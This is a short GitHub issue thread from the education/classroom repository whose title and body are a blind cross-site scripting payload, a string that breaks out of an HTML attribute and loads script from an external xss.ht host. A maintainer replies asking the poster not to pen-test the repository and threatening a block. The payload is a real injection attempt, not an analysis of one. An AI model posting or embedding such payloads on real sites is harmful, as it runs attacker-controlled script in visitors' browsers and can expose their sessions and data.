### ISSUE TITLE
 "><script src=https://bewithsahil001.xss.ht></script>

### ISSUE THREAD

**Issue by bewithsahilsaif** [education/classroom#1208]
"><script src=https://bewithsahil001.xss.ht></script>

**Comment by tarebyte** [comment]
@bewithsahilsaif I see you're a security researcher from your profile. While I appreciate you trying to make GitHub safer by pen testing the site I'm going to ask you don't use this repo as your playground.

If you do this again I'll be forced to either block you from the repository, or mark your account as spam.

Thanks!
